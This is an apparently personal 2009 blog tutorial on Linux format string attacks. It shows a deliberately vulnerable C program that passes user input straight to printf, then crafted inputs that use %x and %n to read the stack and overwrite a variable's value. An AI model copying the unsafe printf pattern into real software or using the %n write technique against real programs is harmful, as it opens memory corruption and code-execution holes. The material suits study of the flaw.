www.main.lv
Don't think just code it

2009-12-25 Linux Format String Attack 1

Format string attack is attack for C formated strings. Format string function is prinrf() there are other functions that support format string.C code for bad used printf(): 
int main( int argc, char **argv )
{
	static int i = 0;
	char text[1000];
	strcpy(text, argv[1]);
	printf("%.8x\n",&i);
	printf("No way it never will works because value of i=%d\n",i);
	printf( text );
	printf("\nValue of i=%d\n",i);
	return 0;
}
First output is adress of static iThan we outputing values of i and call printf() with first argument fo prgramm.and then watching value if i

Run:
./e1 'Halolo'
Output: 
08049674
No way it never will works because value of i=0
Halolo
Value of i=0


Run:
./e1 'Halolo%s'
Output: 

08049674
No way it never will works because value of i=0Halolo(null)
Value of i=0 

Run:
./e1 $'\x74\x96\x04\x08_%x'
Output: 
08049674
No way it never will works because value of i=0
t?_0
Value of i=0

Read about %n in format string:

Run:
./e1 $'\x74\x96\x04\x08_%x_%n'
Output:
08049674
No way it never will works because value of i=0
Segmentation fault
Run:
./e1 $'\x74\x96\x04\x08_%x_%x_%x_%x_%x_%n'
Output: 
08049674
No way it never will works because value of i=0
t?_0_8_40_4_4_
Value of i=16

Run:
./e1 $'\x74\x96\x04\x08_%x_%x_%x_%x_%.1201x_%n'
Output: 

08049674
No way it never will works because value of i=0
t?_0_8_40_4_000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000004_
Value of i=1216

Now you can input almost any value to i